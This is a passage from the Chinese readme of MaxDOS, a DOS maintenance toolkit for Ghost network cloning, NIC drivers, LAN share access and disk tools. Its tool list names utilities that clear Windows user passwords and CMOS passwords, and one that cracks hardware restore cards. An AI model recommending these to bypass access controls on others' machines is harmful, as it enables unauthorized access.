(X为客户机IP,不准从复) DFE530TX 网卡,单分区网刻命令格式如后----> DFE530GX X (X为客户机IP,不准从复) DLE530TX 网卡,单分区网刻命令格式如后----> DLE530GX X (X为客户机IP,不准从复) IP 100 网卡,单分区网刻命令格式如后----> IP100GX X (X为客户机IP,不准从复) PRO100 网卡,单分区网刻命令格式如后----> PRO100GX X (X为客户机IP,不准从复) RTL8029 网卡,单分区网刻命令格式如后----> 8029GX X (X为客户机IP,不准从复) RTL8139 网卡,单分区网刻命令格式如后----> 8139GX X (X为客户机IP,不准从复) SIS900 网卡,单分区网刻命令格式如后----> SIS900GX X (X为客户机IP,不准从复) VIA  网卡,单分区网刻命令格式如后----> VIAGX X (X为客户机IP,不准从复) 注意,前一个X不代表任何意义,后一个X才代表IP的最后一组数字. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& B. 使用NDIS2网卡驱动全自动网刻 5.6S版本网刻服务器的IP应为: 10.1.1.1 奄码为: 255.0.0.0 GHOSTSRV会话名称:max 客户端谁进去都懂的用了因为都是全中文菜单模式,在这里就不再介绍,以下为旧版模式. 友情提醒:您也可以使用新版的网刻模式和旧版网刻模式结合,实现两批机器一起网刻. 关于旧版本的网刻模式,依然是存在的.5.5S或更早旧版本里命令行模式NDIS2驱动网刻, 选择此选项后,默认的会自动加载好您本机的网卡驱动,您可以使用NDISGO X (后面的X代 表您的IP最后一组数字,如: 192.168.5.123 只需输入 NDISGO 123 ) 来实现全盘网刻,因为启动此选项后已经自动加载好网卡驱动,本机的驱动都已经打完,不 管任何网卡都只要输入NDISGO X 来实现全盘刻,和NDISGX X来实现单分区刻即可(当然首 先还是要准备好服务器的情况下的,服务器IP设为:192.168.5.100,子奄码:255.255.255.0 其它不用设,安全起见最好从起一下服务端,然后打开GHOSTSRV,把里面的会话名称设为:max 一定要设为max才可连上),使用NDIS网刻时,无须再像PKT那样输入8139GO,DFE530GO等,不管 任何网卡全盘刻只要输入NDISOGO x (x为客户机的IP最后一位,如 192.168.5.1 只须输入 NDISGO 1 而不是 NDISGO 192.168.5.1 且不能使用 100和超过 255的后面IP)如果您的PKT 驱动不能网刻或没有驱动的话,可以试试用NDIS驱动来网刻! NDIS2驱动支持的网卡所有系列如下: 3Com EtherLink PCI TPO NIC (3C900-TPO) 3Com EtherLink PCI Combo NIC (3C900-COMBO) 3Com EtherLink PCI TPO NIC (3C900B-TPO) 3Com EtherLink PCI Combo NIC (3C900B-COMBO) 3Com EtherLink PCI TPC NIC (3C900B-TPC) 3Com EtherLink PCI Fiber NIC (3C900B-FL) 3Com EtherLink 10/100 PCI NIC (3C905-TX) 3Com EtherLink 10/100 PCI T4 NIC (3C905-T4) 3Com 3C918 Integrated Controller (3C905B-TX Compatible) 3Com EtherLink 10/100 PCI Combo NIC (3C905B-COMBO) 3Com EtherLink 100 PCI Fiber NIC (3C905B-FX) 3Com 3C920 Integrated Controller (3C905C-TX Compatible) 3Com 3C920B-EMB Integrated Fast Ethernet Controller 3Com 3C920B-EMB-WNM Integrated Fast Ethernet Controller 3Com Gigabit NIC (3C940/3C2000) ADMtek AN983 10/100Mbps Fast Ethernet Adapter ADMtek AN983 based Ethernet Adapter ADMtek AN985 10/100Mbps Fast Ethernet Adapter ADMtek ADM9511 10/100Mbps Fast Ethernet Adapter ADMtek ADM9513 10/100Mbps Fast Ethernet Adapter AMD PCNet Family Ethernet Adapter Broadcom 440x 10/100 Integrated Controller Broadcom 440x 10/100 Integrated Controller Broadcom NetXtreme Gigabit Ethernet Controller Broadcom 570x 10/100 Integrated Controller Broadcom NetLink (TM) Gigabit Ethernet Controller Broadcom NetXtreme Gigabit Fiber Broadcom NetXtreme Gigabit Ethernet Controller Broadcom NetXtreme Fast Ethernet Controller DAVICOM DM9 Series PCI Fast Ethernet Adapter DEC Digital Semiconductor 21040 Ethernet Controller DEC Digital Semiconductor 21140 Ethernet Controller DEC Digital Semiconductor 21041 Ethernet Controller DEC Digital Semiconductor 21143/2 Ethernet Controller DigitalChina DCN-530TX Fast Ethernet Adapter D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.A) D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.D) D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.B/A) D-Link DFE-530TX PCI Fast Ethernet Adapter (rev.C) IC Plus IP100 based Fast Ethernet Adapter Intel PRO/100 Mobile Adapters Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel 82562EH based Phoneline Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 M Mobile Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VM Network Connection Intel PRO/100 VE Network Connection Intel PRO/100 VE Network Connection Intel 82559ER Fast Ethernet Controller Intel PRO/100+ PCI Adapter Intel PRO/100 Network Connection Intel 82562 based Fast Ethernet Connection Intel 82562 based Fast Ethernet Connection Intel PRO/1000 Gigabit Server Adapter Intel PRO/1000 F Server Adapter Intel PRO/1000 T Server Adapter Intel PRO/1000 XT Network Connection Intel PRO/1000 XF Network Connection Intel PRO/1000 T Network Connection Intel PRO/1000 XT Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Dual Port Network Connection Intel PRO/1000 MF Server Adapter Intel PRO/1000 MF Dual Port Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 CT Network Connection Intel PRO/1000 MT Quad Port Network Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Server Connection Intel PRO/1000 MF Server Adapter Intel PRO/1000 MB Server Connection Intel PRO/1000 PT Dual Port Network Connection Intel(R) PRO/1000 PF Dual Port Server Adapter Intel(R) PRO/1000 PB Dual Port Server Connection Intel PRO/1000 CT Network Connection Intel PRO/1000 MT Network Connection Intel PRO/1000 MT Mobile Connection Intel PRO/1000 MT Dual Port Network Connection Intel PRO/1000 MF Dual Port Network Connection Intel PRO/1000 MB Dual Port Server Connection Intel PRO/1000 GT Desktop Adapter Intel(R) PRO/1000 PT Server Adapter Intel(R) PRO/1000 PF Server Adapter Intel(R) PRO/1000 PB Server Connection Intel(R) PRO/1000 PM Network Connection Intel(R) PRO/1000 P Network Connection Intel(R) PRO/1000 PL Network Connection Marvell Yukon PCI (PCI-E) Gigabit Controller Marvell Yukon 88E8001/8003/8010 PCI Gigabit Controller Marvell Yukon 88E8035 PCI-E Fast Controller Marvell Yukon 88E8036 PCI-E Fast Controller Marvell Yukon PCI (PCI-E) Gigabit Controller Marvell Yukon PCI (PCI-E) Gigabit Controller Marvell Yukon 88E8052 PCI-E ASF Gigabit Controller Marvell Yukon 88E8050 PCI-E ASF Gigabit Controller Marvell Yukon 88E8053 PCI-E Gigabit Controller Marvell Yukon PCI (PCI-E) Gigabit Controller RealTek RTL8029 PCI Ethernet Adapter RealTek RTL8139/810x Family Fast Ethernet Adapter $ Realtek RTL8169/8110 Family Gigabit Ethernet Adapter SiS 900-Based PCI Fast Ethernet Adapter VIA VT86C100A Rhine Fast Ethernet Adapter VIA Rhine III Management Adapter VIA Rhine II Fast Ethernet Adapter VIA Rhine III Fast Ethernet Adapter Legend DFE-530TX PCI Fast Ethernet Adapter (Rev A) Legend DFE-530TX PCI Fast Ethernet Adapter (Rev B/A) ULi PCI Fast Ethernet Controller ULi Electronics Inc. Realtek RTL8136/810x Family Fast Ethernet NIC Realtek RTL8168/8111 PCI-E Gigabit Ethernet NIC D-Link DFE-550TX FAST Ethernet 10/100 Adapter Sundance ST201 based Adapter NT Driver D-Link DGE-530T Gigabit Ethernet Adapter VIA Networking Velocity-Family Gb Ethernet Adapter RADTEK RTK8189C Based Fast Ethernet Card 支持200多种网卡,还有很多没列出,如果您不知道网卡型号,可尝试使用此项. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& C. nForce 1/2/3/4网卡驱动网刻 nForce MCPx 系列网卡网络刻隆项.由于NF驱动的驱动占用了太大内存,造成无法加载 中文程序,只能使用旧版的NDISGO XX 和 NDISGX XX 命令网刻. NDISGO为全盘网刻命令,后面的XX可以是 1-99和101-254 不得重复. NDISGX为单分网刻命令,后面的XX可以是 1-99和101-254 不得重复.前面的X不作任何代表. 请先将服务端IP设为:192.168.5.100 奄码: 255.255.255.0 GHOSTSRV会话名: max NFORCE的网卡需要同时加载两个网卡驱动文件,无法在自动加载中加载,只能另行加载! 如果您使用此选项存在问题,请尝试使用选项A的GHOST自带万能驱动. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项D. DOS下访问局域网共享资源 进入此项后,系统会自动帮您加载好网卡驱动,并且设置好连接的协议,而且是全中文菜单, 您可以在进入此项后,直接获得局域网里WINDOWS主机上的共享资源,而且支持读写操作当然 这前提您要开启权限.才能实现写操作,您可以根据菜单里的提示操作,也可以使用如NT主机 上的NET命令来实现连接到共享目录,命令行如: net use z: \\max\f 此命令的意思是将Z: 盘,映射到"Max"主机上的"f"为名称的共享目录.您可以参考NT的NET命 令在NT主机上使用 NET /? 或 NET USE /? 获得帮助,当然可能有个别命令不支持. 此选项还包含了 EMM386驱动程序,如果您有特别要求需要用到 EMM386时,可以使用此选项. 友情提醒:您只能通过机器名称来连接您的主机,而不能使用IP地址来连接您的主机.而且您 还能使用此项进行网刻操作,映射好如Z:盘 ,然后在GHOST中选择Z:盘共享目录中的".GHO" 镜像还原或备份进去. 注意:您要访问的机器的工作组必须是: workgroup 而且您被访问的机器必须安装IPX协议 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项E. 还原D:\bak\sys.gho镜像 自动还原 D:\BAK\SYS.GHO 到C盘中!方便自动恢复! &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项F. 驱动USB设备 用来驱动U盘.USB硬盘.USB光驱,驱动后就可以在DOS下访问U盘和USB硬盘的内容了! &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 选项G. 纯DOS模式 用于刷BIOS或运行其它特殊软件.不加载任何东西,无虚拟盘. &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& MAXDOS内置的命令及工具说明: 12.BAT 将第一硬盘GHOST到第二硬盘,注意确认好哪个是第一和第二硬盘哦 21.BAT 将第二硬盘GHOST到第一硬盘,注意确认好哪个是第一和第二硬盘哦 ACOPY.COM 能够完全复制文件和目录,包括它们的长文件名和属性. CHOICE.COM 选择命令,返回按键的ERRORLEVEL值. CLOSE.COM 关闭CD-ROM. Coms.com 一个清除CMOS密码和设置的程序. Mouse.bat 可以直接加载鼠标,以及DOS下使用剪切板程序. CTMOUSE.EXE CuteMouse 1.9版,DOS下最好最实用的鼠标驱动程序. MOUSCLIP.EXE DOS下(包括命令行下)用鼠标复制/粘帖及模拟方向键的工具 DELTREE.COM 删除目录和文件的工具. DEVICE.COM 用命令行模式加载 .SYS 驱动. Diskgen.exe 强大的DOS下中文分区软件.一直用它.Max强烈推荐,强过DM. DREADY.COM 判断驱动器状态,检查光驱中是否有光盘、软盘是否写保护. EXLAN.bat 如果要手动网刻的话.请运行这个解压出DOS的网卡驱. FIND.COM 查找工具的最好的替代程序. FINDCD.EXE 实用的查找光驱盘符的程序. ghost.exe GHOST 8.3 版,如果运行了NTFSDOS.请用Qntfs退出后再运行. IO.SYS MS-DOS 7.10系统内核引导文件.IO输入输出. LABEL.COM 非常小巧的修改磁盘卷标的工具 off.COM 关闭计算机用的..呵呵.. OPEN.COM 打开光驱哦.运行一下光驱自动打开. password.bat DOS下清除2K/XP/2K3的用户密码.支持NTFS/FAT32分区.MAX强烈推荐 PCTOOL.EXE DOS下的类似于WIN资源管理器 pkzip.COM 解压压缩包ZIP用. RANDOM.COM 自动生成字符的东西.可以用来自动分配IP. readme.txt 呵呵.我在这呢. MaxDOS Http://Pzz.Cn r.com 运行一下就知道效果啦,呵呵.重启动计算机用的. SHSUCD1.COM LOADISO用的虚拟光驱驱动. SHSUCDHD.EXE 忘了什么东西啦.呵呵.等下试试. SHSUCDX.EXE 最NB的DOS光驱驱动程序. SPFDISK.BAT 启动管理器+分区管理器,功能强大 TW.BAT 天汇中文系统,支持五笔.拼音.区位.双拼输入法.用QUIT退出! twx.zip 天汇的主程序较大.压缩在这里面了. W.BAT WAIT配置文件. WAIT.COM 用于批处理文件的等待工具,且支持键盘返回值等操作 wbat.com DOS下强大的批处理菜单生成器. Xcopy.EXE 强大的复制程序,可复制带文件夹的目录,加载tw后,使用Xcopy /? XMSDSK.EXE 最好的虚拟内存盘工具,非常方便实用,且只占很少的内存 XDEL.EXE 类似于WIN2K下的RD,可删除目录和子目录里文件. MEM.EXE DOS查看内存占用情况. ADDEV.COM DOS命令行下加载.SYS驱动. ATTRIB.COM 文件/文件夹属性设置命令. DEBUG.EXE 强大的DOS下编程命令. DELDEV.COM 卸载用ADDEV添加的.SYS驱动. EDIT.COM 相当于记事本. FAKEDISK.COM 用来解压.IMG镜像 FDISK.EXE 分区命令 FORMAT.COM 格式化命令 SMARTDRV.EXE DOS下磁盘缓存程序.加载一下可大提高DOS安装系统. SYS.COM 传输MSDOS 7.01 的引导文件到C盘.使用C盘可以引导到DOS. TREE.COM 显示排序命令. Ndisgo 用于旧版本的命令行模式全盘网刻,格式: NDISGO xx Ndisgx 用于旧版本的命令行模式单分区网刻,格式: NDISGX xx AutoGO.bat 5.6版NDIS2驱动的自动网刻菜单.请在选项了引导的第二项时使用. Menu.bat 5.6版选项第一项引导的主菜单,包含PKT驱动网刻及一键恢复备份. Mhdd.bat Mhdd 4.6 强大的磁盘扫描修复程序.强于效率源. NTFSDOS.BAT 新版本的NTFS分区访问程序,支持读写NTFS/EX2/EX3等分区. Qntfs.bat 用于退出NTFSDOS读写分区长驻内存. Quit.exe 用于退出天汇汉字系统,也可以使用 tway /q退出! Hddreg.bat HDDREG 1.51版 俄罗斯出品的硬盘检测程序. LOADISO.BAT DOS下载入ISO光盘镜像.只能读取.不能引导.但可装2K/XP/2K3系统 先切换到存放ISO的目录.输入 loadiso xx.iso (xx为镜像文件名) 3C90Xgo.bat 3C90X系列自动全盘网刻批处理. 3C90XgX.BAT 3C90X系列自动单分区网刻批处理. 8029go.bat 8029系列自动全盘网刻批处理. 8029gX.BAT 8029系列自动单分区网刻批处理. 8139go.bat 8139系列自动全盘网刻批处理. 8139gX.BAT 8139系列自动单分区网刻批处理. viaGO.bat VIA Rhine I/II系列自动全盘网刻批处理. viaGX.BAT VIA Rhine I/II系列自动单分区网刻批处理. DCN530go.bat DCN-530TX系列自动全盘网刻批处理. DCN530gX.BAT DCN-530TX系列自动单分区网刻批处理. DFE530go.bat D-Link DFE-530TX系列自动全盘网刻批处理. DFE530gX.BAT D-Link DFE-530TX系列自动单分区网刻批处理. DLE530go.bat DLE530系列自动全盘网刻批处理. DLE530gX.BAT DLE530系列自动单分区网刻批处理. ip100GO.bat IC Plus ip100系列自动全盘网刻批处理. ip100GX.BAT IC Plus ip100系列自动单分区网刻批处理. pro100go.bat pro100系列自动全盘网刻批处理. pro100gX.BAT pro100系列自动单分区网刻批处理. sis900go.bat sis900系列自动全盘网刻批处理. sis900gX.BAT sis900系列自动单分区网刻批处理. 可能还有个别命令未写上,还需您去挖掘. 关于IELDR由于限制较大,支持性不好,已经在本版中去掉了,请见谅. :) 如果您在使用中遇到问题请上我们的论坛 http://bbs.pzz.cn/thread-htm-fid-8.html 在此感谢网盟中的: Sense 感谢网友: Renda@somewhere 和 lihongqing 感谢所有支持过我们网站会员,和论坛里的所有会员及支持我们的同撩们. 祝您使用愉快 :) 卸载本软件,请在 "控制面板->添加删程序->找到MAXDOS点删除! 本站下载 Http://www1.Pzz.Cn/Soft/MaxDOS56S.RAR 附送服务端 GHOSTSRV 8.3 http://up.pzz.cn/userfiles/max/Ghost83.rar 自动删除LOG文件程序.
升级MaxDOS71
使用说明: 把晨枫U盘维护工具V2.0版解压,然后把下载的MaxDOS.img文件复制到 \MyFeng\Boot\imgs\ 目录下覆盖同名文件即可。(安装U盘前后都可以,建议安装前先替换。) 其它MaxDOS版本提取IMG文件方法: 1、先在 资源管理器 - 文件夹选项 - 取消“隐藏已知文件类型的扩展名”的勾选 2、下载安装好MaxDOS,进 C:\MaxDOS\ 找到 Maxs.sys 重命名为 Maxs.rar 然后解压得到 MaxDOS.exe文件,将其改名为MaxDOS.img即可。 珠海晨枫工作室 Http://MyFeng.CN 2009-02-25 MaxDOS 7.1 说明文件 同时发布的有: 硬盘版支持WINDOWS 2000,XP,2003版,集成GHOST 8.2和GHOST 11.5版 PXE网络启动版集成 GHOST 8.2和GHOST 11.5版 MaxDOS 网刻服务端2.0版 下载地址请见本贴下方。 01月11日主要改进支持大于4G内存问题,以及在2003系统上安装蓝屏问题 增加集成PQ,DM加强版,以及光盘版 MaxDOS 7.1 更新如下: 网刻服务端升级为 MAXNGS 2.0 修正网刻服务端同一时间内DHCP只能提供一个IP地址,第二台无汉获得IP地址. 修正DHCP分配 IP时,一台机器分配了两个IP.修正TFTP不能同时传送多个进程. 增加多网段功能,当使用大网段时,可设置超过多少台机器自动跳跃至下一网段,理论支持无 限台客户端,增加方案功能,当首次设置完毕后,方案将自动被保存,下次使用无需再次设置. MAXDOS客户端: 增加新的引导器,主要用于解决某些特殊的主板,或者某些特殊的芯片组引导问题, 特别是针对笔记本无法引导的问题,以及原来7.0 版的启动花屏,或启动重启等现像的修正. 增加对64位操作系统的支持,主要为 64位的VISTA和2008SERVER的支持问题. 增加对繁体中文操作系统的支持,繁体中文操作系统可正常显示繁体文字. 增加软件的兼容性,增加备份目录创建是否成功提示,以免一键还原失效. 改进Realtek TEL8169网卡驱动问题.增加部份新的网卡驱动. 修正NVDIA自动识别网卡时卡住,改为提示手动加载.增加NDIS驱动手动选择菜单. 修正自动网刻时,使用手动加载网卡驱动时会报错问题. 收入置顶贴中的网卡驱动收集贴的驱动至12月10日.更新内置的常用软件. 更新控制台为 2.0 可显示引导模式状态,及增加引导器新老版本的切换功能. 友情提示,如果你的主板为NVIDIA芯片组,而不能识别网卡的,请尝试使用手动加NVIDIA驱动. 还有其它功能,未能一一列出. =============================================================================== 软件特色功能如下: 1.为装好的Win2K/XP/2K3/VISTA/2008系统加入DOS入口,方便维护与备份还原系统. 2.支持进入DOS时设置密码,密码采用MD5加密,纯绿色软件,不写引导区. 3.内置200多种网卡驱动,实现GHOST网络刻隆及DOS下访问局域网的共享资源. 4.全中文的操作方式,让您使用时更简单,支持DOS下显示中文及五笔拼音输入. 5.完全傻瓜化的网刻模式,让没用过本软件的用户也能轻松实现网刻. 6.支持引导自已制作IMG镜像,并且支持引导自己制作的无限大小IMG镜像. 7.全自动化的中文一键恢复/备份,让您备份/恢复系统时更简便. 8.支持系统盘为NTFS分区,支持读取.修改.删除.复制NTFS分区内容. 9.内置软件如:NT系统密码清除,DISKGEN.SPFDISK.Ghost等软件. 10.支持DOS驱动SATA.SCSI.1394.USB.PCMCIA等设置,可直接在DOS下访问. 11.首家独创全面支持nVIDIA全系列网卡网刻,更多精采内容请查阅“说明文件”. =============================================================================== MaxDOS 7.1  使用前注意事项及常见问题: 重要1: 如果您的机器中同时安装了双系统并且有VISTA或2008系统,请勿必在您的VISTA或 2008系统中安装MaxDOS否则可能不能正常启动MaxDOS,请至我们网站下载专用版本. 重要2: 7.1 版需要专用网刻服务端支持,网刻前请先下载网刻服务端,并且设置好服务端后方 能进入客户端网刻,服务端下载及网刻教程地址 http://pzz.cn/bbs/read.php?tid=50400 网刻前请先关闭局域网中的其它DHCP服务器,以免出现IP分配冲突,造成连接不上服务端. 重要3: 7.1 版的Max防病毒功能需要专用的防病毒控制服务端,如果您安装了防病毒客户端后 请至我们的网站 http://pzz.cn/bbs/read.php?tid=50433 中下载专用的防病毒服务端方 能实现防病毒功能,如果您不需要该功能可以控制面板中的添加删除程序中卸载. 重要4: 7.1 版中的Max防病毒功能主要针对网吧或企业网络进行设计,不建议家庭或个人用户 使用,由于此功能需要专用的服务端支持管理,所以不适合. 重要5: GHOST11依然存在着不会自动分卷问题,这将导致GHOSTSRV上出现不是有效镜像问题 如果你使用手动备份镜像时请加上 -split=2000 参数,格式如 Ghost -split=2000 . 重要6: 如果您的机器运行GHOST时出现进入不了,或者后要等待很久才能出现操作界面问题, 请尝试在运行前加上 -no1394 -nousb -noide参数,格式如 Ghost -no1394 -nousb -noide 重要7: GHOST11制作出的镜像,GHOST83和GHOST82不能识别,也就是说如果你客户机上依然 使用的是GHOST82,您制作网刻镜像时就必须使用GHOST82制作全盘镜像. 6.使用前请务必认真的查阅说明文件,否则造成使用问题,作者不负任何责任. 7.MaxDOS在安装时可以自由的设定密码,安装后无法修改,如果不修改,默认的密码为空. 8.MaxDOS支持 WIN 2K/XP/2003/VISTA/2008,不支持WIN9X/ME,VISTA/2008请下载专用版本. 9.安装MaxDOS时请在解压RAR压缩包后安装,并关闭其它无关程序,避免引起未知的错误. 10.当安装时将启动等待时间设为:0 时,则启动时不会出现MaxDOS的入口选项,相对的系统启度也会快些,需要进入MaxDOS,请在启动时狂按F8键,等出现WINDOWS菜单时,再按ESC键. 11.如果您有多个硬盘,请将您引导MaxDOS系统的硬盘挂接在IDE1接口上,并设置为第一启动设备,SATA硬盘如不能启动,请在BIOS中将硬盘的工作模式设置为: Compatible Mode. 12.安装MaxDOS后请勿使用NTFS磁盘压缩功能,否则将损坏MaxDOS,使用时请关闭该功能. 13.如果安装后出现不能启动或者启动一半时定住,请尝试进入BIOS载入默认高级设置后尝试. 14.GHOST手动操作备份/还原系统,使用教程 http://pzz.cn/bbs/read.php?tid=26423 15.GHOST备份后占用空间,找不到备份文件 http://pzz.cn/bbs/read.php?tid=23699 16.GHOST不是有效的GHO镜像解决方法 http://pzz.cn/bbs/read.php?tid=14535 17.GHOST网络刻隆常见问题及经验分享 http://pzz.cn/bbs/read.php?tid=1585 18.制作GHOST镜像到网络服务器 http://pzz.cn/bbs/read.php?tid=10705 19.GHOST全盘镜像制作(全盘备份)教程 http://pzz.cn/bbs/read.php?tid=26435 20.更多常见问题及使用帮助请参见 http://pzz.cn/bbs/read.php?tid=8505 21.卸载本软件,请在 "控制面板->添加删程序->找到MaxDOS点删除! =============================================================================== MaxDOS 7.1 安装启动后首菜单有7个主选项. 首菜单主选项 A.MaxDOS 工具箱 MaxDOS内置的工具,建议都在此项运行.以下为内置的所有命令及工具的简要介绍. 12.bat 将第一硬盘的资料通过ghost复制到第二硬盘. 21.bat 将第二硬盘的资料通过ghost复制到第一硬盘. Chang.bat 在命令行模式下加载长文件名称的显示支持.Chang /q 退出. CDM.bat 在任何菜单下调用光驱驱动菜单,快速实现加载光驱驱动. Exlan.bat 如果要手动网刻的话.请运行这个解压出dos的pack网卡驱动. Gh.bat MaxDOS下的自动一键备份与还原菜单. Spfdisk.exe 启动管理器+分区管理器,功能强大 Help.bat MaxDOS程序帮助文件.我在这 ^_^ . Idecd.bat 任何菜单任何位置下快速加载ide光驱驱动. Satacd.bat 任何菜单任何位置下快速加载SATA光驱驱动. Loadiso.bat Dos下载入iso光盘镜像.只能读取.不能引导.但可装2k/xp/2k3系统. 先切换到存放iso的目录.输入 Loadiso Xx.iso (xx为镜像文件名). Uniso.bat 卸载上条命令加载的iso命令. M.bat MaxDOS工具箱的主菜单. Mouse.bat 鼠标驱动程序,如果需要鼠标操作请先运行.Mouse /q 退出支持. Ndisgo.bat 用于旧版本的命令行模式全盘网刻,格式: Ndisgo Xx Ndisgx.bat 用于旧版本的命令行模式单分区网刻,格式: Ndisgx Xx Ngo.bat Ndis2网卡驱动选项下的主网刻菜单. PWD.exe Dos下清除2k/xp/2k3/Vista/2008系统用户密码.支持NTFS分区. Pgo.bat Packet网卡驱动选项下的主网刻菜单. Sngo.bat 手动选择加载NDIS网卡驱动进行网刻. 3c90xgo.bat 3com90x系列pack驱动旧版命令行模式全盘网刻批处理. 3c90xgx.bat 3com90x系列pack驱动旧版命令行模式单分区网刻批处理. 8029go.bat Realtek瑞昱8029系列pack驱动旧版命令行模式全盘网刻批处理. 8029gx.bat Realtek瑞昱8029系列pack驱动旧版命令行模式单分区网刻批处理. 8139go.bat Realtek瑞昱8139系列pack驱动旧版命令行模式全盘网刻批处理. 8139gx.bat Realtek瑞昱8139系列pack驱动旧版命令行模式单分区网刻批处理. Dcn530go.bat Dcn-530tx系列pack驱动旧版命令行模式全盘网刻批处理. Dcn530gx.bat Dcn-530tx系列pack驱动旧版命令行模式单分区网刻批处理. Dfe530go.bat D-link Dfe-530tx系列pack驱动旧版命令行模式全盘网刻批处理. Dfe530gx.bat D-link Dfe-530tx系列pack驱动旧版命令行模式单分区网刻批处理. Dle530go.bat 联想dle530系列pack驱动旧版命令行模式全盘网刻批处理. Dle530gx.bat 联想dle530系列pack驱动旧版命令行模式单分区网刻批处理. Ip100go.bat Ic Plus Ip100系列pack驱动旧版命令行模式全盘网刻批处理. Ip100gx.bat Ic Plus Ip100系列pack驱动旧版命令行模式单分区网刻批处理. Pro100go.bat Intel Pro100系列pack驱动旧版命令行模式全盘网刻批处理. Pro100gx.bat Intel Pro100系列pack驱动旧版命令行模式单分区网刻批处理. Sis900go.bat Sis900系列pack驱动旧版命令行模式全盘网刻批处理. Sis900gx.bat Sis900系列pack驱动旧版命令行模式单分区网刻批处理. T8139go.bat 腾达8139d网卡pack驱动系列旧版命令行模式全盘网刻批处理. T8139gx.bat 腾达8139d网卡pack驱动系列旧版命令行模式分区网刻批处理. Via1go.bat Via 其它网卡系列pack驱动系列旧版命令行模式全盘网刻批处理. Via1gx.bat Via 其它网卡系列pack驱动系列旧版命令行模式分区网刻批处理. Viagbgo.bat Via Rhine Iii系列pack驱动系列旧版命令行模式全盘网刻批处理. Viagbgx.bat Via Rhine Iii系列pack驱动系列旧版命令行模式分区网刻批处理. Viago.bat Via Rhine 1/2系列pack驱动系列旧版命令行模式全盘网刻批处理. Viagx.bat Via Rhine 1/2系列pack驱动系列旧版命令行模式分区网刻批处理. Tw.bat 天汇中文支持程序,tw /s加载dos的中文输入法,tw /q退出中文支持. Usbcd.bat 任何菜单任何位置下快速加载usb光驱驱动. Acopy.com 完全复制文件和目录,包括长文件名及属性.运行前建议运行smartdrv Attrib.com 文件/文件夹属性设置命令. Choice.com 选择命令,返回按键的errorlevel值. Coms.com 一个清除cmos密码和设置的程序. Deltree.com 同时删除目录,子目录及文件的工具.操作时请注意. Device.com 用命令行模式加载 .sys 驱动. Deldev.com 卸载上条命令加载的.sys 驱动. Dready.com 判断驱动器状态,检查光驱中是否有光盘.软盘是否写保护. Edit.com 相当于记事本. Fakedisk.com 用来解压.img镜像. Find.exe 文本找加工具. Format.com 格式化fat32分区命令. J.com 弹出或关闭光驱门. Ri.com 内存清空程序,必须先运行驻留,再运行其它程序,使用 ri /cls清空 Label.com 非常小巧的修改磁盘卷标的工具. Mbr.com 磁盘mbr信息备份与还原工具. S.com 关闭计算机. Pkzip.com Zip解压工具. R.com 重新启动计算机. Subst.com 磁盘映射工具. Sys.com 传输msdos 7.01 的引导文件到c盘.使用c盘可以引导到dos. Tree.com 目录树显示工具. Debug.exe 强大的dos下编程命令. Diskgen.exe 强大的dos下中文分区软件.一直用它.Max强烈推荐,强过dm. Fdisk.exe 早期的dos分区命令. Ghost.exe 系统备份还原工具.如果运行了ntfsdos.请用exit退出后再运行. Go.exe 直接跳转至目录,如 Go C:\windows. Mem.exe Dos查看内存占用情况. Mousclip.exe 鼠标剪切板程序. NtfsDOS.bat Ntfs分区读写支持.使用exit退出. Pctool.exe Dos下的类似于win资源管理器 Smartdrv.exe Dos下磁盘缓存程序.加载一下可大提高dos安装系统. Xcopy.exe 强大的复制程序,可复制带文件夹的目录,加载tw后,使用xcopy /? Xdel.exe 类似于winnt下的rd,可删除目录和子目录里文件. Ezcopy.exe 一个国产的免制作镜像直接网刻工具,第一台运行此程序为服务端. Memtest.exe Dos下内存测试程序,请在选项"F 纯DOS模式" 下运行. Crdisk.exe Dos下硬件还原卡通用破解程序. (限加强版) Diskfix.com 分区表修复工具,用于修复受损的分区程序. Pq.bat PQMAGIC硬盘分区分割管理程序. (限加强版) Dm.bat 快速分区DM 9.56万用版. (限加强版) =============================================================================== 首菜单主选项 B.全自动网络刻隆 为了实现全自动化网刻,程序将在5秒内默认执行此选项,并且自动加载网卡驱动,自动进入 GHOST界面等待服务端发送网刻及其它指令(前提是必须准备并设置好网刻服务端) 7.1 